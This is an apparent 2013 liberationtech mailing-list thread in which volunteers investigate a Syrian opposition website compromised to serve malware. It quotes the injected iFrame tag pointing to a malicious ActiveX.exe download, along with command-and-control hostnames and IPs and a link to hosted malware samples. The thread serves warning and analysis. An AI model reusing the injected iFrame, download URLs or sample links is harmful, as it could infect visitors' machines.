Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus - UPDATE

2013-01-30 Thread SiNA Rabbani
Dear List,

Here are more details, with credit to Team Cymru: http://www.team-cymru.org/

> C&C nodes for this version:
>
> melaniibaby.no-ip.biz 173.0.10.52
> ghostsx.8866.org 192.168.11.1 (so not likely to connect)
> awrasx10.no-ip.biz 95.170.198.

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread KheOps
Hello,

I wrote a first summary on the case; I will try to keep it up to date with new data: https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/

All the best,
KheOps

On 30/01/2013 00:00, SiNA Rabbani wrote:
>
> Hi!
>
> I sent the m

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread hadi
Many thanks for posting. I'll spread this to my Syrian friends just to be aware of this.

All the best,
Hadi

On 01/29/2013 11:05 PM, KheOps wrote:
> Dear Libtech,
>
> We just saw that the website http://www.syrian-martyrs.com is probably
> compromised. Every page of the website contains an iFr

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hello,

On 30/01/2013 03:02, SiNA Rabbani wrote:
> Ok. I infected an old Windows XP with this malware and it keeps
> sending SYN requests to this hostname: awrasx10.no-ip.biz which
> currently resolved to: 37.236.124.197 and is down for me.

Thank you for your work :) The hostname still resolves

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
Ok. I infected an old Windows XP with this malware and it keeps sending SYN requests to this hostname: awrasx10.no-ip.biz, which currently resolved to 37.236.124.197 and is down for me.

--SiNA

Internet Protocol Version 4, Src: 10.10.10.17 (10.10.1

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
Hi!

I sent the malware to a couple of friends that have a setup ready. If you want to try this it might be fun: http://docs.cuckoosandbox.org/en/latest/

All the best,
SiNA

KheOps:
> Hey,
>
> On 29/01/2013 23:34, SiNA Rabbani wrote:
>> This is the malware:
>>> https://www.virustotal.com/fil

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread Andrew Lewis
Just a heads up: the site's been taken down, malware is here: https://resources.telecomix.ceops.eu/material/malwares/

Also looking at getting access to the server in question for forensics.

-Andrew

On Jan 30, 2013, at 11:34 AM, SiNA Rabbani wrote:

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hey,

On 29/01/2013 23:34, SiNA Rabbani wrote:
> This is the malware:
>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

Yes, saw that too. However, I don't find any precise description of its behaviour. Like, what it does, if it opens

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
This is the malware:
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

--SiNA

SiNA Rabbani:
> holy shit:
>
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.ex

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
holy shit:

src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe" border="0" frameborder="0">

:/ if you are running Windows don't even go there!!!

Andrew Lewis:
> I can get to this in 6 hours or so, maybe someone is willing to
> ju

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread Andrew Lewis
I can get to this in 6 hours or so, maybe someone is willing to jump on this before then?

-Andrew

On Jan 30, 2013, at 11:06 AM, KheOps wrote:
> Dear Libtech,
>
> We just saw that the website http://www.syrian-martyrs.com is probably
> compromised. Every page of the website contains an iFrame

[liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Dear Libtech,

We just saw that the website http://www.syrian-martyrs.com is probably compromised. Every page of the website contains an iFrame which links to a .exe file which is detected as a virus by antivirus software: http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe

The fac